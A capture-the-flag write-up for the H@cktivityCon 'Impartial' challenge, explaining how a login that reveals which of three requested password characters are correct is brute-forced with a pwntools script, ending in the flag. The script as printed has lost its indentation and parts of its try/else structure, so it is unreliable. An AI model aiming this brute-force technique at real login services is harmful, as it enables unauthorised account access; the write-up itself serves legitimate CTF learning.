Impartial - H@cktivityCon CTF

Category: Scripting
Solves (at time of writing): 137
Description: Check out the terminal-interface for this new company! Can you uncover any secrets?


We're given a server to netcat into.

Netcatting into it gives us a small terminal-ui with an option to log in.

If we try to log in as admin it asks us for 3 random letters of our password (for "security reasons")

And after we put them in, it tells us which ones were right and which ones were wrong ("security"!)

So now we need a script that brute forces every character on every position to get the password.

I've written this "small" python script for it.

from pwn import *

passw = [None] * 48 
index = [None] * 48

r = remote("", 50026)

# 65 - 126 | 65-90 + 95 + 97-122 + 123 + 125
charset = [95]
charset += [i for i in range(97, 123)]
charset += [i for i in range(65, 91)]

while True:
nums = r.recvuntil("Password:").split(b" ")

numone = int(nums[2].strip(b","))
numtwo = int(nums[3].strip(b","))
numthree = int(nums[5])

if passw[numone-1] != None:
    guessone = passw[numone-1]
elif index[numone-1] == None:
    index[numone-1] = 0
    guessone = chr(charset[0])
    index[numone-1] += 1
    guessone = chr(charset[index[numone-1]])

if passw[numtwo-1] != None:
    guesstwo = passw[numtwo-1]
elif index[numtwo-1] == None:
    index[numtwo-1] = 0
    guesstwo = chr(charset[0])
    index[numtwo-1] += 1
    guesstwo = chr(charset[index[numtwo-1]])

if passw[numthree-1] != None:
    guessthree = passw[numthree-1]
elif index[numthree-1] == None:
    index[numthree-1] = 0
    guessthree = chr(charset[0])
    index[numthree-1] += 1
    guessthree = chr(charset[index[numthree-1]])

r.sendline(f"{guessone} {guesstwo} {guessthree}")
solution = r.recvuntil("1.").split(b" ")
solone = b"CORRECT" in solution[3]
soltwo = b"CORRECT" in solution[5]
solthree = b"CORRECT" in solution[7]

if solone:
    passw[numone-1] = guessone
if soltwo:
    passw[numtwo-1] = guesstwo
if solthree:
    passw[numthree-1] = guessthree


except Exception:
r = remote("", 50026)


A few notes to this script:
- The try: except was crucial for this ctf since it had infrastructure problems due to abuse of their services
- The [numone-1] isnt needed, but prettier since as we know computers start counting from 0, and that terminal ui counted from 1

So basically this script uses pwntools/pwnlib to connect to the server, go to the login page, try to log in as user admin
and then just bruteforce.

The characters it uses for the bruteforce are a-z,A-Z,_,{,}

In hindsight I probably should've included numbers too, but luckily it worked without them.

If we let this script run for a while we get the flag: flag{partial_password_puzzle_pieces}

~sw1tchbl4d3, 03/08/2020 (dd/mm/yyyy)